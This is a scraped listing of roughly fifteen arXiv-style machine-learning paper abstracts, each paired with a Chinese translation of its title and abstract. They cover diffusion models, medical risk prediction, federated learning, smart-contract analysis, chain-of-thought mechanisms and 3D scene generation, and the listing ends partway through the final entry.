The training of score-based diffusion models (SDMs) is based on score matching. The challenge of score matching is that it includes a computationally expensive Jacobian trace. While several methods have been proposed to avoid this computation, each has drawbacks, such as instability during training and approximating the learning as learning a denoising vector field rather than a true score. We propose a novel score matching variant, local curvature smoothing with Stein's identity (LCSS). The LCSS bypasses the Jacobian trace by applying Stein's identity, enabling regularization effectiveness and efficient computation. We show that LCSS surpasses existing methods in sample generation performance and matches the performance of denoising score matching, widely adopted by most SDMs, in evaluations such as FID, Inception score, and bits per dimension. Furthermore, we show that LCSS enables realistic image generation even at a high resolution of $1024 \times 1024$.
Updated: 2024-12-05 08:26:13
标题: 使用斯坦恩恒等式进行局部曲率平滑以实现高效的评分匹配
摘要: 得分基于扩散模型(SDMs)的训练基于得分匹配。得分匹配的挑战在于它包括一个计算昂贵的雅可比迹。虽然已经提出了几种方法来避免这种计算,但每种方法都存在缺点,比如在训练过程中的不稳定性以及将学习近似为学习去噪向量场而不是真实得分。我们提出了一种新颖的得分匹配变体,即局部曲率平滑与Stein恒等式(LCSS)。LCSS通过应用Stein恒等式来绕过雅可比迹,从而实现正则化效果和高效计算。我们展示了LCSS在样本生成性能方面超越现有方法,并在类似FID、Inception分数和每维比特等评估中与大多数SDMs广泛采用的去噪得分匹配的性能相匹配。此外,我们展示了LCSS即使在$1024 \times 1024$的高分辨率下也能实现逼真的图像生成。
更新时间: 2024-12-05 08:26:13
领域: cs.LG,cs.CV
Electronic Health Records-Based Data-Driven Diabetes Knowledge Unveiling and Risk Prognosis
In the healthcare sector, the application of deep learning technologies has revolutionized data analysis and disease forecasting. This is particularly evident in the field of diabetes, where the deep analysis of Electronic Health Records (EHR) has unlocked new opportunities for early detection and effective intervention strategies. Our research presents an innovative model that synergizes the capabilities of Bidirectional Long Short-Term Memory Networks-Conditional Random Field (BiLSTM-CRF) with a fusion of XGBoost and Logistic Regression. This model is designed to enhance the accuracy of diabetes risk prediction by conducting an in-depth analysis of electronic medical records data. The first phase of our approach involves employing BiLSTM-CRF to delve into the temporal characteristics and latent patterns present in EHR data. This method effectively uncovers the progression trends of diabetes, which are often hidden in the complex data structures of medical records. The second phase leverages the combined strength of XGBoost and Logistic Regression to classify these extracted features and evaluate associated risks. This dual approach facilitates a more nuanced and precise prediction of diabetes, outperforming traditional models, particularly in handling multifaceted and nonlinear medical datasets. Our research demonstrates a notable advancement in diabetes prediction over traditional methods, showcasing the effectiveness of our combined BiLSTM-CRF, XGBoost, and Logistic Regression model. This study highlights the value of data-driven strategies in clinical decision-making, equipping healthcare professionals with precise tools for early detection and intervention. By enabling personalized treatment and timely care, our approach signifies progress in incorporating advanced analytics in healthcare, potentially improving outcomes for diabetes and other chronic conditions.
Updated: 2024-12-05 08:26:07
标题: 基于电子健康记录的数据驱动型糖尿病知识揭示和风险预测
摘要: 在医疗领域,深度学习技术的应用已经革新了数据分析和疾病预测。这在糖尿病领域尤其明显,通过对电子健康记录(EHR)进行深入分析,开启了早期检测和有效干预策略的新机遇。我们的研究提出了一个创新的模型,结合了双向长短期记忆网络-条件随机场(BiLSTM-CRF)与XGBoost和Logistic回归的融合。该模型旨在通过对电子医疗记录数据进行深入分析,提高糖尿病风险预测的准确性。我们的方法的第一阶段涉及利用BiLSTM-CRF来探究EHR数据中存在的时间特征和潜在模式。这种方法有效地揭示了糖尿病的发展趋势,这些趋势通常隐藏在医疗记录的复杂数据结构中。第二阶段利用XGBoost和Logistic回归的综合优势对这些提取的特征进行分类,评估相关风险。这种双重方法促进了对糖尿病的更加细致和精确的预测,优于传统模型,特别是在处理多方面和非线性医疗数据集方面。我们的研究显示出相对于传统方法,糖尿病预测方面的显著进展,展示了我们结合的BiLSTM-CRF、XGBoost和Logistic回归模型的有效性。这项研究突出了临床决策中数据驱动策略的价值,为医疗专业人员提供了早期检测和干预的精准工具。通过实现个性化治疗和及时护理,我们的方法标志着将先进分析技术纳入医疗领域的进步,可能改善糖尿病和其他慢性疾病的结果。
更新时间: 2024-12-05 08:26:07
领域: cs.LG
A Framework For Image Synthesis Using Supervised Contrastive Learning
Text-to-image (T2I) generation aims at producing realistic images corresponding to text descriptions. Generative Adversarial Network (GAN) has proven to be successful in this task. Typical T2I GANs are 2 phase methods that first pretrain an inter-modal representation from aligned image-text pairs and then use GAN to train image generator on that basis. However, such representation ignores the inner-modal semantic correspondence, e.g. the images with same label. The semantic label in priory describes the inherent distribution pattern with underlying cross-image relationships, which is supplement to the text description for understanding the full characteristics of image. In this paper, we propose a framework leveraging both inter- and inner-modal correspondence by label guided supervised contrastive learning. We extend the T2I GANs to two parameter-sharing contrast branches in both pretraining and generation phases. This integration effectively clusters the semantically similar image-text pair representations, thereby fostering the generation of higher-quality images. We demonstrate our framework on four novel T2I GANs by both single-object dataset CUB and multi-object dataset COCO, achieving significant improvements in the Inception Score (IS) and Frechet Inception Distance (FID) metrics of imagegeneration evaluation. Notably, on more complex multi-object COCO, our framework improves FID by 30.1%, 27.3%, 16.2% and 17.1% for AttnGAN, DM-GAN, SSA-GAN and GALIP, respectively. We also validate our superiority by comparing with other label guided T2I GANs. The results affirm the effectiveness and competitiveness of our approach in advancing the state-of-the-art GAN for T2I generation
Updated: 2024-12-05 08:15:37
标题: 一个使用监督对比学习进行图像合成的框架
摘要: 文本到图像(T2I)生成旨在生成与文本描述相对应的逼真图像。生成对抗网络(GAN)已被证明在此任务中取得成功。典型的T2I GAN是两阶段方法,首先从对齐的图像-文本对中预训练跨模态表示,然后使用GAN在此基础上训练图像生成器。然而,这种表示忽略了内部模态语义对应,例如具有相同标签的图像。先验中的语义标签描述了具有潜在跨图像关系的固有分布模式,这是对文本描述的补充,有助于理解图像的完整特征。在本文中,我们提出了一个框架,通过标签引导的监督对比学习来利用跨模态和内部模态对应。我们将T2I GAN扩展为在预训练和生成阶段中的两个参数共享对比分支。这种集成有效地聚类了语义相似的图像-文本对表示,从而促进了生成更高质量图像。我们在单个对象数据集CUB和多对象数据集COCO上通过四种新型T2I GAN展示了我们的框架,在图像生成评估的Inception Score(IS)和Frechet Inception Distance(FID)指标中取得显著改进。值得注意的是,在更复杂的多对象COCO上,我们的框架分别将AttnGAN、DM-GAN、SSA-GAN和GALIP的FID提高了30.1%、27.3%、16.2%和17.1%。通过与其他标签引导的T2I GAN的比较,我们也验证了我们的优越性。结果证实了我们方法在推进T2I生成的最新GAN方面的有效性和竞争力。
更新时间: 2024-12-05 08:15:37
领域: cs.CV,cs.AI
Adaptive Optimizers with Sparse Group Lasso for Neural Networks in CTR Prediction
We develop a novel framework that adds the regularizers of the sparse group lasso to a family of adaptive optimizers in deep learning, such as Momentum, Adagrad, Adam, AMSGrad, AdaHessian, and create a new class of optimizers, which are named Group Momentum, Group Adagrad, Group Adam, Group AMSGrad and Group AdaHessian, etc., accordingly. We establish theoretically proven convergence guarantees in the stochastic convex settings, based on primal-dual methods. We evaluate the regularized effect of our new optimizers on three large-scale real-world ad click datasets with state-of-the-art deep learning models. The experimental results reveal that compared with the original optimizers with the post-processing procedure which uses the magnitude pruning method, the performance of the models can be significantly improved on the same sparsity level. Furthermore, in comparison to the cases without magnitude pruning, our methods can achieve extremely high sparsity with significantly better or highly competitive performance. The code is available at https://github.com/intelligent-machine-learning/tfplus/tree/main/tfplus.
Updated: 2024-12-05 08:11:50
标题: 使用稀疏组套索的自适应优化器在CTR预测中用于神经网络
摘要: 我们开发了一个新颖的框架,将稀疏组套索的正则化器添加到深度学习中的一类自适应优化器中,如动量、Adagrad、Adam、AMSGrad、AdaHessian等,并创建了一类新的优化器,分别命名为Group Momentum、Group Adagrad、Group Adam、Group AMSGrad和Group AdaHessian等。我们在随机凸设置中建立了经过理论证明的收敛保证,基于原始-对偶方法。我们评估了我们的新优化器在三个大型真实世界广告点击数据集上对最先进的深度学习模型的正则化效果。实验结果显示,与使用幅值修剪方法的后处理程序的原始优化器相比,模型的性能在相同稀疏水平上可以显着提高。此外,与没有幅值修剪的情况相比,我们的方法可以实现极高的稀疏度,并具有更好或高度竞争力的性能。代码可在https://github.com/intelligent-machine-learning/tfplus/tree/main/tfplus 上找到。
更新时间: 2024-12-05 08:11:50
领域: cs.LG
COOL: Efficient and Reliable Chain-Oriented Objective Logic with Neural Networks Feedback Control for Program Synthesis
Program synthesis methods, whether formal or neural-based, lack fine-grained control and flexible modularity, which limits their adaptation to complex software development. These limitations stem from rigid Domain-Specific Language (DSL) frameworks and neural network incorrect predictions. To this end, we propose the Chain of Logic (CoL), which organizes the synthesis process into an activity flow and provides heuristic control to guide the process. Furthermore, by integrating neural networks with libraries and introducing a Neural Network Feedback Control (NNFC) mechanism, our approach modularizes synthesis and mitigates the impact of neural network mispredictions. Experiments on relational and symbolic synthesis tasks show that CoL significantly enhances the efficiency and reliability of DSL program synthesis across multiple metrics. Specifically, CoL improves accuracy by 70% while reducing tree operations by 91% and time by 95%. Additionally, NNFC further boosts accuracy by 6%, with a 64% reduction in tree operations under challenging conditions such as insufficient training data, increased difficulty, and multidomain synthesis. These improvements confirm COOL as a highly efficient and reliable program synthesis framework.
Updated: 2024-12-05 08:10:55
标题: COOL:具有神经网络反馈控制的高效可靠链式目标逻辑在程序综合中的应用
摘要: 程序合成方法,无论是形式化的还是基于神经网络的,都缺乏细粒度的控制和灵活的模块化,这限制了它们对复杂软件开发的适应性。这些限制源自于刚性的领域特定语言(DSL)框架和神经网络不正确的预测。为此,我们提出了Chain of Logic(CoL),将合成过程组织成一个活动流,并提供启发式控制来引导该过程。此外,通过将神经网络与库集成并引入神经网络反馈控制(NNFC)机制,我们的方法模块化合成并减轻了神经网络错误预测的影响。在关系和符号合成任务上的实验表明,CoL显著提高了DSL程序合成在多个指标上的效率和可靠性。具体来说,CoL将准确性提高了70%,同时将树操作减少了91%,时间减少了95%。此外,NNFC在挑战性条件下,如训练数据不足、难度增加和多领域合成时,进一步提高了准确性6%,树操作减少了64%。这些改进证实了COOL作为一个高效可靠的程序合成框架。
更新时间: 2024-12-05 08:10:55
领域: cs.SE,cs.LG
BEFL: Balancing Energy Consumption in Federated Learning for Mobile Edge IoT
Federated Learning (FL) is a privacy-preserving distributed learning paradigm designed to build a highly accurate global model. In Mobile Edge IoT (MEIoT), the training and communication processes can significantly deplete the limited battery resources of devices. Existing research primarily focuses on reducing overall energy consumption, but this may inadvertently create energy consumption imbalances, leading to the premature dropout of energy-sensitive devices.To address these challenges, we propose BEFL, a joint optimization framework aimed at balancing three objectives: enhancing global model accuracy, minimizing total energy consumption, and reducing energy usage disparities among devices. First, taking into account the communication constraints of MEIoT and the heterogeneity of devices, we employed the Sequential Least Squares Programming (SLSQP) algorithm for the rational allocation of communication resources. Based on this, we introduce a heuristic client selection algorithm that combines cluster partitioning with utility-driven approaches to alleviate both the total energy consumption of all devices and the discrepancies in energy usage.Furthermore, we utilize the proposed heuristic client selection algorithm as a template for offline imitation learning during pre-training, while adopting a ranking-based reinforcement learning approach online to further boost training efficiency. Our experiments reveal that BEFL improves global model accuracy by 1.6\%, reduces energy consumption variance by 72.7\%, and lowers total energy consumption by 28.2\% compared to existing methods. The relevant code can be found at \href{URL}{https://github.com/juzehao/BEFL}.
Updated: 2024-12-05 07:58:32
标题: BEFL:在移动边缘物联网中平衡联邦学习的能耗
摘要: 联邦学习(FL)是一种保护隐私的分布式学习范式,旨在构建高度准确的全局模型。在移动边缘物联网(MEIoT)中,训练和通信过程会显著消耗设备有限的电池资源。现有研究主要集中在减少总体能耗,但这可能会无意中导致能耗不均衡,导致能源敏感设备过早退出。为了解决这些挑战,我们提出了BEFL,这是一个旨在平衡三个目标的联合优化框架:提高全局模型的准确性,最小化总能耗,并减少设备之间的能耗差异。首先,考虑到MEIoT的通信限制和设备的异构性,我们采用顺序最小二乘规划(SLSQP)算法来合理分配通信资源。基于此,我们引入了一个启发式客户端选择算法,将集群划分与效用驱动方法相结合,以减轻所有设备的总能耗以及能耗差异。此外,我们利用所提出的启发式客户端选择算法作为脱机模仿学习的模板,在线采用基于排名的强化学习方法进一步提高训练效率。我们的实验显示,与现有方法相比,BEFL将全局模型的准确性提高了1.6%,能耗差异降低了72.7%,总能耗降低了28.2%。相关代码可在\href{URL}{https://github.com/juzehao/BEFL} 找到。
更新时间: 2024-12-05 07:58:32
领域: cs.LG,cs.DC
Learning Speed-Adaptive Walking Agent Using Imitation Learning with Physics-Informed Simulation
Virtual models of human gait, or digital twins, offer a promising solution for studying mobility without the need for labor-intensive data collection. However, challenges such as the sim-to-real gap and limited adaptability to diverse walking conditions persist. To address these, we developed and validated a framework to create a skeletal humanoid agent capable of adapting to varying walking speeds while maintaining biomechanically realistic motions. The framework combines a synthetic data generator, which produces biomechanically plausible gait kinematics from open-source biomechanics data, and a training system that uses adversarial imitation learning to train the agent's walking policy. We conducted comprehensive analyses comparing the agent's kinematics, synthetic data, and the original biomechanics dataset. The agent achieved a root mean square error of 5.24 +- 0.09 degrees at varying speeds compared to ground-truth kinematics data, demonstrating its adaptability. This work represents a significant step toward developing a digital twin of human locomotion, with potential applications in biomechanics research, exoskeleton design, and rehabilitation.
Updated: 2024-12-05 07:55:58
标题: 学习速度自适应的步行代理使用具有物理信息的仿真的模仿学习
摘要: 人类步态的虚拟模型,或数字双胞胎,为研究移动性提供了一个有前途的解决方案,而无需进行劳动密集型的数据收集。然而,挑战,如模拟与现实之间的差距和对不同行走条件的有限适应性仍然存在。为了解决这些问题,我们开发并验证了一个框架,用于创建一个骨骼人形代理,能够适应不同的行走速度,同时保持生物力学上逼真的动作。该框架结合了一个合成数据生成器,从开源生物力学数据中产生生物力学合理的步态运动学,以及一个使用对抗性模仿学习来训练代理的行走策略的训练系统。我们进行了全面的分析,比较了代理的运动学、合成数据和原始生物力学数据集。与地面真实运动学数据相比,代理在不同速度下实现了5.24 +- 0.09度的均方根误差,表明了其适应性。这项工作代表了朝着开发人类运动的数字双胞胎迈出的重要一步,具有在生物力学研究、外骨骼设计和康复等领域的潜在应用。
更新时间: 2024-12-05 07:55:58
领域: cs.RO,cs.LG
WACANA: A Concolic Analyzer for Detecting On-chain Data Vulnerabilities in WASM Smart Contracts
WebAssembly (WASM) has emerged as a crucial technology in smart contract development for several blockchain platforms. Unfortunately, since their introduction, WASM smart contracts have been subject to several security incidents caused by contract vulnerabilities, resulting in substantial economic losses. However, existing tools for detecting WASM contract vulnerabilities have accuracy limitations, one of the main reasons being the coarse-grained emulation of the on-chain data APIs. In this paper, we introduce WACANA, an analyzer for WASM contracts that accurately detects vulnerabilities through fine-grained emulation of on-chain data APIs. WACANA precisely simulates both the structure of on-chain data tables and their corresponding API functions, and integrates concrete and symbolic execution within a coverage-guided loop to balance accuracy and efficiency. Evaluations on a vulnerability dataset of 133 contracts show WACANA outperforming state-of-the-art tools in accuracy. Further validation on 5,602 real-world contracts confirms WACANA's practical effectiveness.
Updated: 2024-12-05 07:51:17
标题: WACANA:一种用于检测WASM智能合约中链上数据漏洞的共轭分析器
摘要: WebAssembly(WASM)已经成为几个区块链平台智能合约开发中至关重要的技术。不幸的是,自从引入以来,WASM智能合约遭遇了多起由合约漏洞引发的安全事件,导致了巨额经济损失。然而,现有的用于检测WASM合约漏洞的工具存在精度限制,其中一个主要原因是对链上数据API的粗粒度模拟。 本文介绍了WACANA,一个用于检测WASM合约漏洞的分析器,通过对链上数据API进行细粒度模拟,准确地检测漏洞。WACANA精确模拟了链上数据表的结构及其对应的API函数,并在一个覆盖引导循环中集成了具体和符号执行,以平衡准确性和效率。对包含133个合约的漏洞数据集的评估显示,WACANA在准确性方面优于现有技术。对5,602个现实世界合约的进一步验证证实了WACANA的实际效果。
更新时间: 2024-12-05 07:51:17
领域: cs.CR,cs.SE
Chain-of-Thought in Large Language Models: Decoding, Projection, and Activation
Chain-of-Thought prompting has significantly enhanced the reasoning capabilities of large language models, with numerous studies exploring factors influencing its performance. However, the underlying mechanisms remain poorly understood. To further demystify the operational principles, this work examines three key aspects: decoding, projection, and activation, aiming to elucidate the changes that occur within models when employing Chainof-Thought. Our findings reveal that LLMs effectively imitate exemplar formats while integrating them with their understanding of the question, exhibiting fluctuations in token logits during generation but ultimately producing a more concentrated logits distribution, and activating a broader set of neurons in the final layers, indicating more extensive knowledge retrieval compared to standard prompts. Our code and data will be publicly avialable when the paper is accepted.
Updated: 2024-12-05 07:47:29
标题: 大型语言模型中的思维链:解码、投影和激活
摘要: 思维链提示显著增强了大型语言模型的推理能力,许多研究探讨了影响其性能的因素。然而,其基本机制仍未被充分理解。为了进一步揭示操作原则,本研究考察了解码、投影和激活三个关键方面,旨在阐明在使用思维链时模型内发生的变化。我们的发现表明,LLMs有效地模仿示范格式,并将其与对问题的理解相结合,生成过程中标记概率出现波动,但最终产生更集中的概率分布,并激活最终层中更广泛的神经元集,表明与标准提示相比,进行了更广泛的知识检索。当论文被接受时,我们的代码和数据将公开可用。
更新时间: 2024-12-05 07:47:29
领域: cs.AI
Quality In / Quality Out: Data quality more relevant than model choice in anomaly detection with the UGR'16
Autonomous or self-driving networks are expected to provide a solution to the myriad of extremely demanding new applications with minimal human supervision. For this purpose, the community relies on the development of new Machine Learning (ML) models and techniques. %, like the celebrated Deep Learning (DL). However, ML can only be as good as the data it is fitted with, and data quality is an elusive concept difficult to assess. In this paper, we show that relatively minor modifications on a benchmark dataset (UGR'16, a flow-based real-traffic dataset for anomaly detection) cause significantly more impact on model performance than the specific ML technique considered. We also show that the measured model performance is uncertain, as a result of labelling inaccuracies. Our findings illustrate that the widely adopted approach of comparing a set of models in terms of performance results (e.g., in terms of accuracy or ROC curves) may lead to incorrect conclusions when done without a proper understanding of dataset biases and sensitivity. We contribute a methodology to interpret a model response that can be useful for this understanding.
Updated: 2024-12-05 07:46:11
标题: 质量进入/质量输出:在UGR'16异常检测中,数据质量比模型选择更重要
摘要: 自主或自动驾驶网络预计将为众多极具挑战性的新应用提供解决方案,减少人为监督的需求。为此,社区依赖于开发新的机器学习(ML)模型和技术,如著名的深度学习(DL)。然而,ML的表现只能与其拟合的数据一样好,而数据质量是一个难以评估的模糊概念。在本文中,我们展示了对基准数据集(UGR'16,一个基于流量的真实流量数据集,用于异常检测)进行相对较小的修改会对模型性能产生比特定的ML技术考虑更大的影响。我们还展示了测量的模型性能存在不确定性,这是由于标记不准确造成的。我们的研究结果表明,当没有正确理解数据集偏见和敏感性的情况下进行性能结果(例如准确性或ROC曲线)比较的广泛采用方法可能导致错误的结论。我们提供了一种可用于理解的模型响应的方法学。
更新时间: 2024-12-05 07:46:11
领域: cs.LG
Enhancing and Accelerating Diffusion-Based Inverse Problem Solving through Measurements Optimization
Diffusion models have recently demonstrated notable success in solving inverse problems. However, current diffusion model-based solutions typically require a large number of function evaluations (NFEs) to generate high-quality images conditioned on measurements, as they incorporate only limited information at each step. To accelerate the diffusion-based inverse problem-solving process, we introduce \textbf{M}easurements \textbf{O}ptimization (MO), a more efficient plug-and-play module for integrating measurement information at each step of the inverse problem-solving process. This method is comprehensively evaluated across eight diverse linear and nonlinear tasks on the FFHQ and ImageNet datasets. By using MO, we establish state-of-the-art (SOTA) performance across multiple tasks, with key advantages: (1) it operates with no more than 100 NFEs, with phase retrieval on ImageNet being the sole exception; (2) it achieves SOTA or near-SOTA results even at low NFE counts; and (3) it can be seamlessly integrated into existing diffusion model-based solutions for inverse problems, such as DPS \cite{chung2022diffusion} and Red-diff \cite{mardani2023variational}. For example, DPS-MO attains a peak signal-to-noise ratio (PSNR) of 28.71 dB on the FFHQ 256 dataset for high dynamic range imaging, setting a new SOTA benchmark with only 100 NFEs, whereas current methods require between 1000 and 4000 NFEs for comparable performance.
Updated: 2024-12-05 07:44:18
标题: 优化测量以增强和加速基于扩散的反问题求解
摘要: 扩散模型最近在解决反问题方面取得了显著的成功。然而,当前基于扩散模型的解决方案通常需要大量的函数评估(NFEs)来生成基于测量条件的高质量图像,因为它们每个步骤仅包含有限的信息。为加速基于扩散的反问题解决过程,我们引入了\textbf{M}easurements \textbf{O}ptimization(MO),这是一个更有效的即插即用模块,用于在反问题解决过程的每个步骤中整合测量信息。该方法在FFHQ和ImageNet数据集上对八个不同的线性和非线性任务进行了全面评估。通过使用MO,我们在多个任务上建立了业界领先的性能,具有以下关键优势:(1)它在不超过100个NFE的情况下运行,仅对ImageNet上的相位恢复任务是个例外;(2)即使在较低的NFE计数下,它也能实现SOTA或接近SOTA的结果;(3)它可以无缝地集成到现有基于扩散模型的反问题解决方案中,例如DPS \cite{chung2022diffusion}和Red-diff \cite{mardani2023variational}。例如,DPS-MO在FFHQ 256数据集上实现了28.71 dB的峰值信噪比(PSNR),为高动态范围成像设定了新的SOTA基准,仅需100个NFE,而当前方法需要1000至4000个NFE才能实现可比较的性能。
更新时间: 2024-12-05 07:44:18
领域: cs.CV,cs.AI
Differentially Private Synthetic Data via Foundation Model APIs 1: Images
Generating differentially private (DP) synthetic data that closely resembles the original private data is a scalable way to mitigate privacy concerns in the current data-driven world. In contrast to current practices that train customized models for this task, we aim to generate DP Synthetic Data via APIs (DPSDA), where we treat foundation models as blackboxes and only utilize their inference APIs. Such API-based, training-free approaches are easier to deploy as exemplified by the recent surge in the number of API-based apps. These approaches can also leverage the power of large foundation models which are only accessible via their inference APIs. However, this comes with greater challenges due to strictly more restrictive model access and the need to protect privacy from the API provider. In this paper, we present a new framework called Private Evolution (PE) to solve this problem and show its initial promise on synthetic images. Surprisingly, PE can match or even outperform state-of-the-art (SOTA) methods without any model training. For example, on CIFAR10 (with ImageNet as the public data), we achieve FID <= 7.9 with privacy cost {\epsilon} = 0.67, significantly improving the previous SOTA from {\epsilon} = 32. We further demonstrate the promise of applying PE on large foundation models such as Stable Diffusion to tackle challenging private datasets with a small number of high-resolution images. The code and data are released at https://github.com/microsoft/DPSDA.
Updated: 2024-12-05 07:43:25
标题: 通过基础模型API实现差分私密合成数据1:图像
摘要: 生成与原始私有数据密切相似的差分私有(DP)合成数据是在当前以数据驱动的世界中减轻隐私问题的一种可扩展的方法。与为此任务训练定制模型的当前做法相反,我们的目标是通过API(DPSDA)生成DP合成数据,其中我们将基础模型视为黑匣子,并且仅利用它们的推断API。这种基于API、无需训练的方法更容易部署,正如最近API应用数量的激增所证明的那样。这些方法还可以利用仅通过它们的推断API可访问的大型基础模型的强大功能。然而,这也带来了更大的挑战,因为模型访问更加严格限制,需要保护来自API提供者的隐私。 在本文中,我们提出了一个名为Private Evolution(PE)的新框架来解决这个问题,并展示了其在合成图像上的初步效果。令人惊讶的是,PE可以在没有任何模型训练的情况下与甚至胜过最先进的方法。例如,在CIFAR10(以ImageNet作为公共数据)上,我们实现了FID <= 7.9,隐私成本{\epsilon} = 0.67,显著改进了先前{\epsilon} = 32的最先进技术。我们进一步展示了将PE应用于大型基础模型(如稳定扩散)以解决具有少量高分辨率图像的具有挑战性的私有数据集的潜力。代码和数据发布在https://github.com/microsoft/DPSDA。
更新时间: 2024-12-05 07:43:25
领域: cs.CV,cs.CR,cs.LG
Representation Alignment for Generation: Training Diffusion Transformers Is Easier Than You Think
Recent studies have shown that the denoising process in (generative) diffusion models can induce meaningful (discriminative) representations inside the model, though the quality of these representations still lags behind those learned through recent self-supervised learning methods. We argue that one main bottleneck in training large-scale diffusion models for generation lies in effectively learning these representations. Moreover, training can be made easier by incorporating high-quality external visual representations, rather than relying solely on the diffusion models to learn them independently. We study this by introducing a straightforward regularization called REPresentation Alignment (REPA), which aligns the projections of noisy input hidden states in denoising networks with clean image representations obtained from external, pretrained visual encoders. The results are striking: our simple strategy yields significant improvements in both training efficiency and generation quality when applied to popular diffusion and flow-based transformers, such as DiTs and SiTs. For instance, our method can speed up SiT training by over 17.5$\times$, matching the performance (without classifier-free guidance) of a SiT-XL model trained for 7M steps in less than 400K steps. In terms of final generation quality, our approach achieves state-of-the-art results of FID=1.42 using classifier-free guidance with the guidance interval.
Updated: 2024-12-05 07:39:22
标题: 生成的表示对齐:训练扩散变压器比您想象的要容易
摘要: 最近的研究表明,在(生成式)扩散模型中的去噪过程可以引发模型内有意义的(判别式)表达,尽管这些表达的质量仍落后于最近自监督学习方法学习到的表达。我们认为,在训练大规模扩散模型进行生成时的一个主要瓶颈在于有效地学习这些表达。此外,通过将高质量的外部视觉表达纳入训练中,而不是仅依赖扩散模型独立学习它们,可以使训练变得更容易。我们通过引入一种简单的正则化方法称为REPresentation Alignment (REPA) 来研究这一点,该方法将去噪网络中嘈杂输入隐藏状态的投影与来自外部预训练的视觉编码器获得的清晰图像表达进行对齐。结果令人惊讶:我们的简单策略在应用于流行的扩散和基于流的变压器,如DiTs和SiTs时,在训练效率和生成质量方面取得了显著改进。例如,我们的方法可以将SiT的训练加速超过17.5倍,与在不到400K步中训练了7M步的SiT-XL模型的性能(无分类器引导)相匹配。就最终的生成质量而言,我们的方法利用无分类器引导和引导间隔实现了FID=1.42的最新结果。
更新时间: 2024-12-05 07:39:22
领域: cs.CV,cs.LG
JANUS: A Difference-Oriented Analyzer For Financial Centralization Risks in Smart Contracts
Some smart contracts violate decentralization principles by defining privileged accounts that manage other users' assets without permission, introducing centralization risks that have caused financial losses. Existing methods, however, face challenges in accurately detecting diverse centralization risks due to their dependence on predefined behavior patterns. In this paper, we propose JANUS, an automated analyzer for Solidity smart contracts that detects financial centralization risks independently of their specific behaviors. JANUS identifies differences between states reached by privileged and ordinary accounts, and analyzes whether these differences are finance-related. Focusing on the impact of risks rather than behaviors, JANUS achieves improved accuracy compared to existing tools and can uncover centralization risks with unknown patterns. To evaluate JANUS's performance, we compare it with other tools using a dataset of 540 contracts. Our evaluation demonstrates that JANUS outperforms representative tools in terms of detection accuracy for financial centralization risks . Additionally, we evaluate JANUS on a real-world dataset of 33,151 contracts, successfully identifying two types of risks that other tools fail to detect. We also prove that the state traversal method and variable summaries, which are used in JANUS to reduce the number of states to be compared, do not introduce false alarms or omissions in detection.
Updated: 2024-12-05 07:35:56
标题: JANUS:智能合约中金融集中风险的差异导向分析器
摘要: 一些智能合约通过定义管理其他用户资产的特权账户而违反了去中心化原则,而没有得到许可,引入了中心化风险,导致了财务损失。然而,现有方法面临着准确检测多样化中心化风险的挑战,因为它们依赖于预定义的行为模式。在本文中,我们提出了JANUS,一种用于检测Solidity智能合约的金融中心化风险的自动分析器,独立于其具体行为。JANUS识别特权账户和普通账户达到的状态之间的差异,并分析这些差异是否与金融相关。JANUS侧重于风险的影响而不是行为,相比现有工具,JANUS实现了更高的精度,并可以揭示具有未知模式的中心化风险。为了评估JANUS的性能,我们使用一个包含540个合约的数据集将其与其他工具进行比较。我们的评估表明,JANUS在金融中心化风险检测准确性方面优于代表性工具。此外,我们还在一个包含33,151个合约的真实数据集上对JANUS进行评估,成功识别其他工具未能检测到的两种风险类型。我们还证明了JANUS中用于减少要比较的状态数量的状态遍历方法和变量摘要不会引入虚假警报或漏报。
更新时间: 2024-12-05 07:35:56
领域: cs.LG,cs.CR
Deep Learning Modeling Method for RF Devices Based on Uniform Noise Training Set
As the scale and complexity of integrated circuits continue to increase, traditional modeling methods are struggling to address the nonlinear challenges in radio frequency (RF) chips. Deep learning has been increasingly applied to RF device modeling. This paper proposes a deep learning-based modeling method for RF devices using a uniform noise training set, aimed at modeling and fitting the nonlinear characteristics of RF devices. We hypothesize that a uniform noise signal can encompass the full range of characteristics across both frequency and amplitude, and that a deep learning model can effectively capture and learn these features. Based on this hypothesis, the paper designs a complete integrated circuit modeling process based on measured data, including data collection, processing, and neural network training. The proposed method is experimentally validated using the RF amplifier PW210 as a case study. Experimental results show that the uniform noise training set allows the model to capture the nonlinear characteristics of RF devices, and the trained model can predict waveform patterns it has never encountered before. The proposed deep learning-based RF device modeling method, using a uniform noise training set, demonstrates strong generalization capability and excellent training performance, offering high practical application value.
Updated: 2024-12-05 07:34:04
标题: 基于均匀噪声训练集的射频器件深度学习建模方法
摘要: 随着集成电路规模和复杂性的不断增加,传统建模方法在解决射频(RF)芯片中的非线性挑战方面面临困难。深度学习越来越多地应用于RF器件建模。本文提出了一种基于深度学习的RF器件建模方法,使用统一噪声训练集,旨在建模和拟合RF器件的非线性特性。我们假设统一噪声信号可以涵盖频率和幅度两个方面的全部特征范围,并且深度学习模型可以有效地捕捉和学习这些特征。基于这一假设,本文设计了一个完整的基于测量数据的集成电路建模过程,包括数据收集、处理和神经网络训练。所提出的方法以RF放大器PW210作为案例研究进行了实验验证。实验结果表明,统一噪声训练集使模型能够捕捉RF器件的非线性特性,训练模型能够预测以前未遇到过的波形模式。所提出的基于深度学习的RF器件建模方法,使用统一噪声训练集,展示出强大的泛化能力和优秀的训练性能,具有高实际应用价值。
更新时间: 2024-12-05 07:34:04
领域: eess.SP,cs.LG
InfiniCube: Unbounded and Controllable Dynamic 3D Driving Scene Generation with World-Guided Video Models
We present InfiniCube, a scalable method for generating unbounded dynamic 3D driving scenes with high fidelity and controllability. Previous methods for scene generation either suffer from limited scales or lack geometric and appearance consistency along generated sequences. In contrast, we leverage the recent advancements in scalable 3D representation and video models to achieve large dynamic scene generation that allows flexible controls through HD maps, vehicle bounding boxes, and text descriptions. First, we construct a map-conditioned sparse-voxel-based 3D generative model to unleash its power for unbounded voxel world generation. Then, we re-purpose a video model and ground it on the voxel world through a set of carefully designed pixel-aligned guidance buffers, synthesizing a consistent appearance. Finally, we propose a fast feed-forward approach that employs both voxel and pixel branches to lift the dynamic videos to dynamic 3D Gaussians with controllable objects. Our method can generate controllable and realistic 3D driving scenes, and extensive experiments validate the effectiveness and superiority of our model.
Updated: 2024-12-05 07:32:20
标题: InfiniCube:具有无限且可控的动态3D驾驶场景生成与世界引导视频模型
